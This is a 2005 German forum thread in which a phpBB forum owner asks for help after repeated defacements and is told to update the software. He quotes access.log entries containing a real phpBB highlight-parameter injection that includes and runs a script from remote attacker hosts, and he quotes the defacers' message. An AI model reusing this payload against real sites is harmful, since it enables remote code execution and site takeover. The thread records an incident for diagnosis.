Hacker - gs-500.de

King Madness · 14.12.2005, 01:22:54

Ich habe mal eine Frage zum Thema Hacker.

Mein Billard Forum wird seit einigen Tagen dauernd von Hackern abngegriffen (ich gehe mal davon aus, das die mir irgendwo ein Script untergejubelt haben).

Hat schon mal jemand etwas von diesen Hackern gehört : (modded by sirh0t fuck Aleks)" ???

Hat jemand eine Ahnung wie ich rausbekommen kann, wo dir mir das Script versteckt haben können ?

Ich habe schon die komplette Homepage vom Server genommen, ein Update aufgespielt (also nicht die gleichen Daten) und die Datenbank neu aufgespielt.

Langsam weiß ich keinen rat mehr.

In meiner access.log finden sich folgende Einträge :
Einträge vom 10. Dez.

Zitat:

205.234.100.65 - - [10/Dec/2005:14:39:28 +0100] "GET /forum/viewtopic.php?p=3735&highlight=%2527.$poster=inclu de($_GET[m]).%2527&
m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 17200 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t fuck Aleks)"

Einträge von heute :

Zitat:

195.225.236.162 - - [13/Dec/2005:22:16:30 +0100] "GET /forum/viewtopic.php?p=3735&highlight=%2527.$poster=inclu de($_GET[m]).%2527&m=http://makturk.com/irc/gallery/files/phpbb_private?& HTTP/1.0" 200 17340 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t and Aleks)"

Klar ist mir nur, das das Script immer das Posting 3735 mit Highlight 2527 sucht.
Die IP Adressen ändern sich alle paar Minuten.

Was mir persönlich jetzt auch nichts sagt, ist die türkische Adresse (http://www.yatas.com und http://www.matuk.com) und warum die google.ne Adresse da drin ist.

***verdi*** · 14.12.2005, 03:04:38

update mal dein phpbb

15.12.2005, 09:05:10

was steht denn in dem besagten Post drin? kannst du den irgendwo in der DB finden? steht da irgendwas merkwürdiges?

King Madness · 15.12.2005, 14:16:40

So, habe mal die Software aktualisiert, ein Hacker-Mod eingebaut und wieder aufgespielt, mal sehen, ob es diesmal hält.

Es waren so genannte Script Kiddies, die eine Seite von ausserhalb manipulieren.

Folgender Text war zu lesen (und ist auch nicht in der Datenbank :

Zitat:

FUCK YOU 0X1FE AND ALL PEOPLE IN UR CHANNEL

FUCK BOTS, FUCK BOXTALK HOPE ALL U LAMERS GET BUSTED

SOON I OWN U ALL!!!

Credits to sirh0t and phpbb

Dazu kommt noch, das sie auf ein "nicht jugendfreies) Bild verlinken wollten (was aber durch einen Fehler nicht geschehen ist)

14.12.2005, 03:04:38	#2
*verdi* Administrator Registriert seit: 15.05.2002 Ort: Hamburg Alter: 43 Beiträge: 9.038 Baujahr: 1994 Kilometer: 45000	update mal dein phpbb __________________ When I get sad, I stop being sad and be awesome again. True story.

15.12.2005, 09:05:10	#3
thel0rd Gast Beiträge: n/a	was steht denn in dem besagten Post drin? kannst du den irgendwo in der DB finden? steht da irgendwas merkwürdiges?

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen